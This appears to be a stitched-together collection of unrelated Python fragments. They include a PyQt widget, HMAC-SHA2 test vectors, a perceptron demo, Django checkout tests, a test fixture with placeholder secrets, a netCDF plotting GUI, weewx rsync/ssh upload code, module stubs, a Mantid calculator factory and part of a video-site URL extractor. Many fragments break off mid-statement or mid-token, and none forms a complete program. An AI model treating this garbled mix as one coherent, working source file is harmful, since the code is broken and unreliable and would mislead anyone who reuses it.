Gui import * from PyQt5.QtWidgets import * class ObjectInspectorWidget(QWidget): def __init__(self, parent = None): super(ObjectInspectorWidget, self).__init__(parent) layout = QVBoxLayout() self.tab = QTabWidget()
self.properties_tree = QTreeWidget() self.properties_tree.setHeaderLabels(["",""]) self.properties_tree.setAlternatingRowColors(True) self.properties_tree.setColumnCount(2) self.properties_tree.header().resizeSection(0, 200) self.tab.addTab(self.properties_tree, "Properties") layout.addWidget(self.tab) self.setLayout(layout) self.setGeometry(0,0,100, 400) def update(self, props): self.properties_tree.clear() data_tree = QTreeWidgetItem(self.properties_tree) data_tree.setText(0,"Data") #data_tree.setFont(0,QFont(c.FONT_NAME, c.FONT_SIZE_1, QFont.Bold)) labels = props.keys() values = props.values() self.populateTree(data_tree, labels, values) def populateTree(self, parent,labels,values): for i,j in zip(labels,values): if j is None: continue item = QTreeWidgetItem(parent) item.setText(0,i) #item.setFont(0,QFont(c.FONT_NAME, c.FONT_SIZE_2, QFont.Normal)) if isinstance(j,bool): if j is True: item.setText(1, c.MARK) else: item.setText(1, c.CROSS) else: item.setText(1,str(j)) #item.setFont(1,QFont(c.FONT_NAME, c.FONT_SIZE_3, QFont.Normal)) self.properties_tree.expandItem(parent)
t=b'Sample message for keylen<blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B', 'hex', ), mac=codecs.decode( 'E3D249A8' 'CFB67EF8' 'B7A169E9' 'A0A59971' '4A2CECBA' '65999A51' 'BEB8FBBE', 'hex', ), ), TestVector( digestcls=sha2.SHA224, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F' '40414243' '44454647' '48494A4B' '4C4D4E4F' '50515253' '54555657' '58595A5B' '5C5D5E5F' '60616263', 'hex', ), mac=codecs.decode( '91C52509' 'E5AF8531' '601AE623' '0099D90B' 'EF88AAEF' 'B961F408' '0ABC014D', 'hex', ), ), # SHA-256 based HMACs TestVector( digestcls=sha2.SHA256, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '2425262728292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F', 'hex', ), mac=codecs.decode( '8BB9A1DB' '9806F20DF7F77B82' '138C7914' 'D174D59E' '13DC4D01' '69C9057B' '133E1D62', 'hex', ), ), TestVector( digestcls=sha2.SHA256, text=b'Sample message for keylen<blocklen', key=codecs.decode( '00010203' '0405060708090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F', 'hex', ), mac=codecs.decode( 'A28CF431' '30EE696A98F14A37' '678B56BC' 'FCBDD9E5' 'CF69717F' 'ECF5480F' '0EBDF790', 'hex', ), ), TestVector( digestcls=sha2.SHA256, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F' '40414243' '44454647' '48494A4B' '4C4D4E4F' '50515253' '54555657' '58595A5B' '5C5D5E5F' '60616263', 'hex', ), mac=codecs.decode( 'BDCCB6C7' '2DDEADB5' '00AE7683' '86CB38CC' '41C63DBB' '0878DDB9' 'C7A38A43' '1B78378D', 'hex', ), ), # SHA-384 based HMACs TestVector( digestcls=sha2.SHA384, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '
0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F' '40414243' '44454647' '48494A4B' '4C4D4E4F' '50515253' '54555657' '58595A5B' '5C5D5E5F' '60616263'
'64656667' '68696A6B' '6C6D6E6F' '70717273' '74757677' '78797A7B' '7C7D7E7F', 'hex', ), mac=codecs.decode( '63C5DAA5' 'E651847C' 'A897C958' '14AB830B' 'EDEDC7D2' '5E83EEF9' '195CD458' '57A37F44' '8947858F' '5AF50CC2' 'B1B730DD' 'F29671A9', 'hex', ), ), TestVector( digestcls=sha2.SHA384, text=b'Sample message for keylen<blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '1415161718191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F', 'hex', ), mac=codecs.decode( '6EB242BD' 'BB582CA1' '7BEBFA48' '1B1E2321' '1464D2B7' 'F8C20B9FF2201637' 'B93646AF' '5AE9AC31' '6E98DB45' 'D9CAE773' '675EEED0', 'hex', ), ), TestVector( digestcls=sha2.SHA384, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F' '40414243' '44454647' '48494A4B' '4C4D4E4F' '50515253' '54555657' '58595A5B' '5C5D5E5F' '60616263' '64656667' '68696A6B' '6C6D6E6F' '70717273' '74757677' '78797A7B' '7C7D7E7F' '80818283' '84858687' '88898A8B' '8C8D8E8F' '90919293' '94959697' '98999A9B' '9C9D9E9F' 'A0A1A2A3' 'A4A5A6A7' 'A8A9AAAB' 'ACADAEAF' 'B0B1B2B3' 'B4B5B6B7' 'B8B9BABB' 'BCBDBEBF' 'C0C1C2C3' 'C4C5C6C7', 'hex', ), mac=codecs.decode( '5B664436' 'DF69B0CA' '22551231' 'A3F0A3D5' 'B4F97991' '713CFA84' 'BFF4D079' '2EFF96C2' '7DCCBBB6' 'F79B65D5' '48B40E85' '64CEF594', 'hex', ), ), # SHA-512 based HMACs TestVector( digestcls=sha2.SHA512, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F' '40414243' '44454647' '48494A4B' '4C4D4E4F' '50515253' '54555657' '58595A5B' '5C5D5E5F' '60616263' '64656667' '68696A6B' '6C6D6E6F' '70717273' '74757677' '78797A7B' '7C7D7E7F', 'hex', ), mac=codecs.decode( 'FC25E240' '658CA785' 'B7A811A8' 'D3F7B4CA' '48CFA26A' '8A366BF2' 'CD1F836B' '05FCB024' 'BD368530' '81811D6C' 'EA4216EB' 'AD79DA1C' 'FCB95EA4' '586B8A0C' 'E356596A' '55FB1347', 'hex', ), ), TestVector( digestcls=sha2.SHA512, text=b'Sample message for keylen<blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F', 'hex', ), mac=codecs.decode( 'FD44C18B' 'DA0BB0A6' 'CE0E82B0' '31BF2818' 'F6539BD5' '6EC00BDC' '10A8A2D7' '30B3634D' 'E2545D63' '9B0F2CF7' '10D0692C' '72A1896F' '1F211C2B' '922D1A96' 'C392E07E' '7EA9FEDC', 'hex', ), ), TestVector( digestcls=sha2.SHA512, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F' '40414243' '44454647' '48494A4B' '4C4D4E4F' '50515253' '54555657' '58595A5B' '5C5D5E5F' '60616263' '64656667' '68696A6B' '6C6D6E6F' '70717273' '74757677' '78797A7B' '7C7D7E7F' '80818283' '84858687' '88898A8B' '8C8D8E8F' '90919293' '94959697' '98999A9B' '9C9D9E9F' 'A0A1A2A3' 'A4A5
import numpy as np import pandas as pd import matplotlib.pyplot as plt def plot_decision_regions(X, y, clf, res=0.02): x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1 y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1 xx, yy = np.meshgrid(np.arange(x_min, x_max, res), np.arange(y_min, y_max, res)) Z = clf.predict(np.c_[xx.ravel(), yy.ravel()]) Z = Z.reshape(xx.shape) plt.contourf(xx, yy, Z, alpha=0.4) plt.scatter(X[:, 0],
X[:, 1], c=y, alpha=0.8) plt.xlim(xx.min(), xx.max()) plt.ylim(yy.min(), yy.max()) class Perceptron(object): def __init__(self, eta=0.01, epochs=50): self.eta = eta self.epochs = epochs def train(self, X, y): self.w_ = np.zeros(1 + X.shape[1]) self.errors_ = [] for _ in ran
ge(self.epochs): errors = 0 for xi, target in zip(X, y): update = self.eta * (target - self.predict(xi)) self.w_[1:] += update * xi self.w_[0] += update errors += int(update != 0.0) self.errors_.append(errors) return self def net_input(self, X): return np.dot(X, self.w_[1:]) + self.w_[0] def predict(self, X): return np.where(self.net_input(X) >= 0.0, 1, -1) # Корректные выходы перцептрона для данной выборки y = np.array([[1],[1],[1],[1],[-1],[-1],[-1],[-1]]).reshape(8,1) # Массив входных данных для перцептрона X = np.array([[0,3],[1,2],[2,2],[4,0],[-1,2],[2,0],[3,-1],[4,-1]]).reshape(8,2) ppn = Perceptron(epochs=10, eta=0.1) ppn.train(X, y) plot_decision_regions(X, y, clf=ppn) plt.title('Perceptron') plt.xlabel('X') plt.ylabel('Y') plt.show() plt.plot(range(1, len(ppn.errors_)+1), ppn.errors_, marker='o') plt.xlabel('Iterations') plt.ylabel('Misclassifications') plt.show()
# -*- coding: utf-8 -*- import os from django.conf import settings from django.core.urlresolvers import reverse from django.test import Client from .....checkout.tests import BaseCheckoutAppTests from .....delivery.tests import TestDeliveryProvider from .....order import handler as order_handler from .....payment import ConfirmationFormNeeded from .....payment.tests import TestPaymentProvider from .....pricing import handler as pricing_handler from .....product import handler as product_handler from .....product.tests import DeadParrot from .....product.tests.pricing import FiveZlotyPriceHandler from ..app import checkout_app from .....cart.tests import TestCart from .....order.tests import TestOrder class TestPaymentProviderWithConfirmation(TestPaymentProvider): def confirm(self, order, typ=None): raise ConfirmationFormNeeded(action='http://test.payment.gateway.example.com') class App(BaseCheckoutAppTests): checkout_app = checkout_app urls = BaseCheckoutAppTests.MockUrls(checkout_app=checkout_app) def setUp(self): checkout_app.cart_model = TestCart checkout_app.order_model = TestOrder self.parrot = DeadParrot.objects.create(slug='parrot', species='Hyacinth Macaw') self.dead_parrot = self.parrot.variants.create(color='blue', looks_alive=False) satchless_dir = os.path.join(os.path.dirname(__file__), '..', '..', '..', '..') self.custom_settings = { 'SATCHLESS_PRODUCT_VIEW_HANDLERS': ('satchless.cart.add_to_cart_handler',), 'TEMPLATE_DIRS': (os.path.join(satchless_dir, 'category', 'templates'), os.path.join(satchless_dir, 'order', 'templates'), os.path.join(satchless_dir, 'cart', 'templates'), os.path.join(satchless_dir, 'cart', 'templates'), os.path.join(os.path.join(os.path.dirname(__file__), 'templates')), os.path.join(os.path.join(os.path.dirname(__file__), '..', 'templates'))), 'TEMPLATE_LOADERS': ( 'django.template.loaders.filesystem.Loader', ) } self.original_settings = self._setup_settings(self.custom_settings) product_handler.init_queue() order_handler.delivery_queue = order_handler.DeliveryQueue(TestDeliveryProvider) order_handler.payment_queue = order_handler.PaymentQueue(TestPaymentProviderWithConfirmation) self.anon_client = Client() self.original_pricing_handlers = settings.SATCHLESS_PRICING_HANDLERS pricing_handler.pricing_queue = pricing_handler.PricingQueue(FiveZlotyPriceHandler) def tearDown(self): self._teardown_settings(self.original_settings, self.custom_settings) product_handler.init_queue() pricing_handler.pricing_queue = pricing_handler.PricingQueue(*self.original_pricing_handlers) def test_checkout_view_passes_with_correct_data(self): cart = self._get_or_create_cart_for_client(self.anon_client) cart.replace_item(self.dead_parrot, 1) order = self._get_or_create_order_for_client(self.anon_client) response = self._test_status(reverse('checkout:checkout', kwargs={'order_token': order.token}), client_instance=self.anon_client, data={'email': 'foo@example.com'}) dg = response.context['delivery_group_forms'] data = {'billing_first_name': 'First', 'billing_last_name': 'Last', 'billing_street_address_1': 'Via Rodeo 1', 'billing_city': 'Beverly Hills', 'billing_country': 'US', 'billing_country_area': 'AZ', 'billing_phone': '555-555-5555', 'billing_postal_code': '90210'} for g, typ, form in dg: data[form.add_prefix('email')] = 'foo@example.com' response = self._test_status(self.checkout_app.reverse('checkout', kwargs={'order_token': order.token}), client_instance=self.anon_client, status_code=302, method='post', data=data, follow=True) order = self.checkout_app.order_model.objects.get(pk=order.pk) self.assertRedirects(response, reverse('checkout:confirmation', kwargs={'order_token': order.token})) self.asse
rtEqual(order.status, 'pay
ment-pending') def test_confirmation_view_redirects_when_order_or_payment_is_missing(self): cart = self._get_or_create_cart_for_client(self.anon_client) cart.replace_item(self.dead_parrot, 1) order = self._get_or_create_order_for_client(self.anon_client) # without payment self._test_status(reverse('checkout:confirmation', kwargs={'order_token': order.token}), client_instance=self.anon_client, status_code=302) # finish checkout view response = self._test_status(self.checkout_app.reverse('checkout', kwargs={'order_token': order.token}), client_instance=self.anon_client, data={'email': 'foo@example.com'}) dg = response.context['delivery_group_forms'] data = {'billing_first_name': 'First', 'billing_last_name': 'Last', 'billing_street_address_1': 'Via Rodeo 1', 'billing_city': 'Beverly Hills', 'billing_country': 'US', 'billing_country_area': 'AZ', 'billing_phone': '555-555-5555', 'billing_postal_code': '90210'} for g, typ, form in dg: data[form.add_prefix('email')] = 'foo@example.com' response = self._test_status(self.checkout_app.reverse('checkout', kwargs={'order_token': order.token}), client_instance=self.anon_client, status_code=302, method='post', data=data, follow=True) self._test_status(self.checkout_app.reverse('confirmation', kwargs={'order_token': order.token}), client_instance=self.anon_client, status_code=200)
# -*- coding: utf-8 -*- # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. import os import pytest import backend_common @pytest.fixture(scope='session') def app(): '''Load shipit_api in test mode ''' import shipit_api config = backend_common.testing.get_app_config({ 'SQLALCHEMY_DATABASE_URI': 'sqlite://', 'SQLALCHEMY_TRACK_MODIFICATIONS': False, 'AUTH_CLIENT_ID
': 'dummy_id', 'AUTH_CLIENT_SECRET': 'dummy_secret', 'AUTH_DOMAIN': 'auth.localho
st', 'AUTH_REDIRECT_URI': 'http://localhost/login', 'OIDC_USER_INFO_ENABLED': True, 'OIDC_CLIENT_SECRETS': os.path.join(os.path.dirname(__file__), 'client_secrets.json'), 'TASKCLUSTER_CLIENT_ID': 'something', 'TASKCLUSTER_ACCESS_TOKEN': 'something', }) app = shipit_api.create_app(config) with app.app_context(): backend_common.testing.configure_app(app) yield app
faces/embedding_in_qt_sgskip.html from matplotlib.backends.qt_compat import QtCore, QtWidgets, is_pyqt5 if is_pyqt5(): from matplotlib.backends.backend_qt5agg import ( FigureCanvas, NavigationToolbar2QT as NavigationToolbar) else: from matplotlib.backends.backend_qt4agg import ( FigureCanvas, NavigationToolbar2QT as NavigationToolbar) from matplotlib.figure import Figure logging.basicConfig(stream=sys.stderr, level=logging.INFO) logger = logging.getLogger('todl_quickview') logger.setLevel(logging.DEBUG) # FP07 Polynom hack T = np.asarray([1.4, 9.01, 20.96, 27.55,34.77]) V = np.asarray([2.95, 2.221, 1.508, 1.26, 1.07]) P = np.polyfit(V,T,2) #print('Polynom',P) #https://stackoverflow.com/questions/18539679/embedding-the-matplotlib-toolbar-in-pyqt4-using-matplotlib-custom-widget#18563884 class MplCanvas(FigureCanvas): def __init__(self): self.fig = Figure() self.ax = self.fig.add_subplot(111) FigureCanvas.__init__(self, self.fig) FigureCanvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding) FigureCanvas.updateGeometry(self) class MplWidget(QtWidgets.QWidget): def __init__(self, parent = None): QtWidgets.QWidget.__init__(self, parent) self.canvas = MplCanvas() self.mpl_toolbar = NavigationToolbar(self.canvas, self) self.vbl = QtWidgets.QVBoxLayout() self.vbl.addWidget(self.canvas) self.vbl.addWidget(self.mpl_toolbar) self.setLayout(self.vbl) class todlquickviewMainWindow(QtWidgets.QMainWindow): """The main interface of the TODL-Quickview gui """ def __init__(self,fname): QtWidgets.QMainWindow.__init__(self) self.all_widgets = [] mainMenu = self.menuBar() self.setWindowTitle("TODL Quickview") #self.setWindowIcon(QtGui.QIcon('logo/pymqdatastream_logo_v0.2.svg.png')) extractAction = QtWidgets.QAction("&Quit", self) extractAction.setShortcut("Ctrl+Q") extractAction.setStatusTip('Closing the program') extractAction.triggered.connect(self.close_application) fileMenu = mainMenu.addMenu('&File') fileMenu.addAction(extractAction) self.statusBar() self.mainwidget = todlquickviewWidget(fname) self.setCentralWidget(self.mainwidget) self.width_orig = self.frameGeometry().width() self.height_orig = self.frameGeometry().height() self.width_main = self.width_orig self.height_main = self.height_orig def close_application(self): logger.debug('Goodbye!') self.close() for w in self.mainwidget.plotWidgets: w.close() self.mainwidget.close() class todlquickviewWidget(QtWidgets.QWidget): """ """ def __init__(self,fname=None): QtWidgets.QMainWindow.__init__(self) layout = QtWidgets.QGridLayout() self.plotWidgets = [] self.data = {} self.layout = layout self.setLayout(layout) self.plot_button = QtWidgets.QPushButton('Plot') self.plot_button.clicked.connect(self.plot_data) self.var_combo = QtWidgets.QComboBox(self) self.layout.addWidget(self.var_combo,0,0) self.layout.addWidget(self.plot_button,0,1) if(fname is not None): logger.debug('Opening file:' + fname) self.read_ncfile(fname) self.show() def plot_data(self): print('Plotting') plotvar_y = self.var_combo.currentText() plotdata_y = self.data[plotvar_y][plotvar_y][:] plotdata_x = self.data[plotvar_y]['x0'][:] try: lab_unit = '[' + self.data[plotvar_y][plotvar_y].units + ']' except: lab_unit = '' ylabel = plotvar_y + lab_unit #if('ch1' in plotvar_y): if False: print('Calculating temperature from polynom') plotdata_y = np.polyval(P,plotdata_y) plotdata_y = np.ma.masked_where((plotdata_y > T.max()) | (plotdata_y < T.min()),plotdata_y) #print(T.max(),T.min()) # Calculate the frequency fi = 1/(np.diff(plotdata_x).mean()) plotFrame = MplWidget() ax = plotFrame.canvas.ax plotFrame.canvas.ax.plot(plotdata_x,plotdata_y) ax.set_title('Frequency:' + str(fi)) ax.set_xlabel('t [s]') ax.set_ylabel(ylabel) plotFrame.show() self.plotWidgets.append(plotFrame) def read_ncfile(self,fname): nc = netCDF4.Dataset(fname) # Try to read ADC data try: nca = nc.groups['adc'] except: nca = None pass if(nca is not None): for varname in nca.variables: vartmp = nca.variables[varname] print(vartmp) print(vartmp.dimensions[0]) if(not "cnt" in varname): self.data[vartmp.name] = {vartmp.name:vartmp,vartmp.dimensions[0]:nca.variables[vartmp.dimensions[0]]} self.data[vartmp.name]['x0'] = self.data[vartmp.name][vartmp.dimensions[0]] # Add to the gui self.var_combo.addItem(varname) #self.FLAG_CH1=True #print('Found ch1 ADC data') else: print('cnt ...') # Read in PyroScience data print('Trying Firesting data') try: ncp = nc.groups['pyro'] cnt10ks_p = ncp.variables['cnt10ks_pyro'][:] #time_p = netCDF4.num2date(ncp.variables['time'][:],units = ncp.variables['time'].units) fp = 1/(np.diff(cnt10ks_p).mean()) # Add to the gui self.var_combo.addItem('phi') #phi = ncp.variables['phi'][:] # Add to the data self.data['phi'] = {'phi':ncp.variables['phi'],'cnt10ks_p':ncp.variables['cnt10ks_pyro']} self.data['phi']['x0'] = self.data['phi']['cnt10ks_p'] self.FLAG_PYRO=True print('Found Pyro data') except Exception as e: print('Pyro:' + str(e)) self.FLAG_PYRO=False # Read in IMU print('Trying IMU data') try: self.FLAG_IMU = True for g in nc.groups: print(g) if('imu' in g): nci = nc.groups[g] try: cntvar = 'cnt10ks_imu' nci.variables[cntvar][:] except: cntvar = 'cnt10ks' nci.variables[cntvar][:]
cnt10ks_imu = nci.variables[cntvar][:] #time_imu = netCDF4.num2date(nci.variables['time'][:],units=nci.variables['t
ime'].units) fi = 1/(np.diff(cnt10ks_imu).mean()) for vartmp in nci.variables: print(vartmp) if(not "cnt" in vartmp): varname = g + ' ' + vartmp print('reading') self.var_combo.addItem(varname) self.data[varname] = {varname:nci.variables[vartmp],'cnt10ks':nci.variables[cntvar]} self.data[varname]['x0'] = self.data[varname][cntvar] #accx = nci.variables['accx'][:] #accy = nci.variables['accy'][:] #accz = nci.variables['accz'][:] #gyrox = nci.variables['gyrox'][:] #gyroy = nci.variables['gyroy'][:] #gyroz = nci.variables['gyroz'][:] #magx = nci.variables['magx'][:] #magy = nci.variables['magy'][:] #magz = nci.variables['magz'][:] print('Found IMU data') except Exception as e: print('Ha
command # will run!? build the ssh command - n.b: spaces cause wobblies! cmd = ['ssh'] cmd.extend(["%s@%s" % (rsync_user, rsync_server)]) mkdirstr = "mkdir -p" cmd.extend([mkdirstr]) cmd.extend([rem_path]) if wxobs_debug == 2: loginf("sshcmd %s" % cmd) subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) rsync_ssh_str = rem_path rsync_message = ("code 11, rsync mkdir cmd executed" " in % 0.2f seconds") elif ("code 12") and ("Permission denied") in stroutput: if wxobs_debug == 2: logdbg("rsync code 12 - %s" % stroutput) rsync_message = ("Permission error in rsync command, probably at" " remote end authentication ! FIX ME !") loginf(" ERR %s " % (rsync_message)) rsync_message = "code 12, rsync failed, executed in % 0.2f seconds" elif ("code 12") and ("No route to host") in stroutput: if wxobs_debug == 2: logdbg("rsync code 12 - %s" % stroutput) rsync_message = "No route to host error in rsync command ! FIX ME!" loginf(" ERR %s " % (rsync_message)) rsync_message = "code 12, rsync failed, executed in % 0.2f seconds" else: logerr("rsync [%s] reported this error: %s" % (cmd, stroutput)) if log_success: if wxobs_debug == 0: t_o = '' rsync_ssh_str = '' else: t_o = ' to ' t_2 = time.time() loginf("%s" % rsync_message % (t_2-t_1) + t_o + rsync_ssh_str) class wxobs(SearchList): def __init__(self, generator): SearchList.__init__(self, generator) """ This is a minimal SLE - all we want is to make the php configuration easier by transferring the database values as used by weewx, plus a few other variables. It has since expanded to allow the transfer of the sqlite database by using rsync, providing the [Remote] section of the config is populated In wxobs/skin.conf: send_inc: An option to stop sending the include file/s. These contain the database configuration values, timezone and oprional debugging stanzas for the php script to operate. Needless to say you need to send them at least once. If you can't think of a reason why you'd need this then you don't need to implement it. I run a mysql database locally and export an sqlite to the remote. This allows me to do that without too much trouble (remembering to set up the symlinks is the biggest issue) include_path: the directory where the php include file will be stored this holds the database configuration as sourced from weewx.conf If you store them locally you can change that path using this option. If you send the files to another server you can change this path using dest_directory (which will affect the database also.) disp_interval: is the time between displayed records; 1800 is a half-hour and is the default display_type: 'single' (default) or 'average' Whether to return the timestamped entry for the value displayed in the periodic Stats table (single), or average it over all the database entries between it and the previous one that was displayed. (average) app_Temp: This is a recent addition to weewx and is not enabled by default. The calculation is performed but there is no field in the stock database. This variable allows for the substitution with another value. The default is to use windchill. Keep it to the group_degrees (because the label is hard coded in.) timezone: If the date or time is not being displayed correctly we'll assume it's a php issue and pass a timezone string to the script. This can be done by adding your time zone as the following example indicates. Replace the string with your zone description timezone = Melbourne/Australia self.php_error: enable php error messages in index.php. This maybe useful at the start of configuration, it shouldn't be needed after everything is running smoothly default is False. set to True to enable this to be sent via the in
clude file. [[Remote]] This is used when you want to tra
nsfer the include file and the database to a remote machine where the web files have been sent seperately with the weewx.conf [FTP] or [RSYNC] section. dest_directory: is the switch that turns this o. It transfers BOTH the include and database files to the same directory as the tuple specifies If using multiple databases and include files make sure they are unique ie:- if you are transferring from multiple machine. It will fetch the rsync user and server from the wxobs/skin.conf file and use those values or if they are missing then it will use the values from the [RSYNC] section of weewx.conf which is possibly configured already. rsync_user (user) = user_name for rsync command rsync_server (server)= ip address of the remote machine send_include = True #This is the default, set to False if you don't want to send the include file repeatedly to the server. Use with caution (ie: remember this setting when things stop working, it might be the cure) rsync_options: Not documented in the skin.conf Default is '-ac'. Use with caution and no spaces allowed. [[RainTiming]] shift_rain: For rain accounting times other than midnight to midnight set this to True If no other options are given the accounting time will be the australian rain day which starts at 9 a.m. default is false - start at midnight 00:00:00 through to the next day. rain_start: used to shift time (in seconds) to something other than 9a.m. The default is 32400 rain_label: the o'clock label for the rain_start above. default is 9 show_warning: An information message will appear on the report page (index.php) if the database is in US units (imperial) or units are detected that don't match the native units required for the delta-T calcs. An information div is included in the report page when this occurs. This is a switch (boolean) to turn it off. wxobs_debug: Allow index.php to include debugging info if set to... 1 and above is low level, variables, some logic. 2 is for wxobs remote cmds etc. 3 only for delta-T final values (low level - if enabled) 4 only for delta-T unit conversion calcs (verbose) - if enabled 5 only for ordinalCompass conversion calcs (N, NE...CALM) (verbose) 6 is for database debugging [[DeltaT]] calculate_deltaT: Whether to generate deltaT for the report page. Default is not to generate that data. This is a switch (boolean) to turn it on. [[PHPUnits]] tempConvert: speedConvert: pressConvert: rainConvert: These are all used to convert the database units to ones for display by the php generated report. Because we are bypassing weewx to generate the historical data, we can't utilize the inbuilt weewx functions for unit conversion therefore we need to affect them ourselves. This is performed (if needed) by specifying the conversion to be done from the [[PHPUnits]] section of the skin.conf file. The default is to perform no conversion, to accept the units as they are. """ self.wxobs_version = wxobs_version self.wxobs_debug = int(self.generator.skin_dict['wxobs'].get( 'wxobs_debug', '0')) self.send_inc = to_bool(self.generator.skin_dict['wxobs'].get(
# © 2017 Sergio Teruel <sergio.ter
uel@tecnativa.com> # License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl). from .hooks impor
t pre_init_hook from . import models from . import report
# Copyright (c) 2014,
Max Zwiessele, James Hensman # Licensed under the BSD 3-clause license (see LICENSE.txt) from paramz.transformations import * from paramz.transformations imp
ort __fixed__
# Mantid Repository : https://github.com/mantidproject/mantid # # Copyright &copy; 2018 ISIS Rutherford Appleton Laboratory UKRI, # NScD Oak Ridge National Laboratory, European Spallation Source # & Institut Laue - Langevin # SPDX - License - Identifier: GPL - 3.0 + from __future__ import (absolute_import, division, print_function) import AbinsModules class CalculateS(object): """ Class producer for generating required S calculator Currently available S calculators: * SPowderSemiEmpiricalCalculator """ @staticmethod def init(filename=None, temperature=None, sample_form=None, abins_data=None, instrument=None, quantum_order_num=None, bin_width=1.0): """ :param filename: name of input DFT file (CASTEP: foo.phonon) :param temperature: temperature in K for which calculation of S
should be done :param sample_form: form in which experimental sample is: Powder or SingleCrystal (str) :param abins_data: object of type AbinsData with data from phonon file :param instrument: object of type Instrument for which simulation should be performed :p
aram quantum_order_num: number of quantum order events taken into account during the simulation :param bin_width: width of bins in wavenumber """ if sample_form in AbinsModules.AbinsConstants.ALL_SAMPLE_FORMS: if sample_form == "Powder": return AbinsModules.SPowderSemiEmpiricalCalculator(filename=filename, temperature=temperature, abins_data=abins_data, instrument=instrument, quantum_order_num=quantum_order_num, bin_width=bin_width) # TODO: implement numerical powder averaging # elif sample == "SingleCrystal": #TODO implement single crystal scenario else: raise ValueError("Only implementation for sample in the form of powder is available.") else: raise ValueError("Invalid sample form %s" % sample_form)
'id': 'e3f585b550a280af23c98b6cb2be19fb_part2', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }, { 'info_dict': { 'id': 'e3f585b550a280af23c98b6cb2be19fb_part3', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }, { 'info_dict': { 'id': 'e3f585b550a280af23c98b6cb2be19fb_part4', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }, { 'info_dict': { 'id': 'e3f585b550a280af23c98b6cb2be19fb_part5', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }, { 'info_dict': { 'id': 'e3f585b550a280af23c98b6cb2be19fb_part6', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }, { 'info_dict': { 'id': 'e3f585b550a280af23c98b6cb2be19fb_part7', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }, { 'info_dict': { 'id': 'e3f585b550a280af23c98b6cb2be19fb_part8', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }], 'params': { 'skip_download': True, }, }, { 'url': 'http://www.iqiyi.com/w_19rt6o8t9p.html', 'only_matching': True, }, { 'url': 'http://www.iqiyi.com/a_19rrhbc6kt.html', 'only_matching': True, }, { 'url': 'http://yule.iqiyi.com/pcb.html', 'only_matching': True, }] _FORMATS_MAP = [ ('1', 'h6'), ('2', 'h5'), ('3', 'h4'), ('4', 'h3'), ('5', 'h2'), ('10', 'h1'), ] @staticmethod def md5_text(text): return hashlib.md5(text.encode('utf-8')).hexdigest() def construct_video_urls(self, data, video_id, _uuid): def do_xor(x, y): a = y % 3 if a == 1: return x ^ 121 if a == 2: return x ^ 72 return x ^ 103 def get_encode_code(l): a = 0 b = l.split('-') c = len(b) s = '' for i in range(c - 1, -1, -1): a = do_xor(int(b[c - i - 1], 16), i) s += chr(a) return s[::-1] def get_path_key(x, format_id, segment_index): mg = ')(*&^flash@#$%a' tm = self._download_json( 'http://data.video.qiyi.com/t?tn=' + str(random.random()), video_id, note='Download path key of segment %d for format %s' % (segment_index + 1, format_id) )['t'] t = str(int(math.floor(int(tm) / (600.0)))) return self.md5_text(t + mg + x) video_urls_dict = {} for format_item in data['vp']['tkl'][0]['vs']: if 0 < int(format_item['bid']) <= 10: format_id = self.get_format(format_item['bid']) else: continue video_urls = [] video_urls_info = format_item['fs'] if not format_item['fs'][0]['l'].startswith('/'): t = get_encode_code(format_item['fs'][0]['l']) if t.endswith('mp4'): video_urls_info = format_item['flvs'] for segment_index, segment in enumerate(video_urls_info): vl = segment['l'] if not vl.startswith('/'): vl = 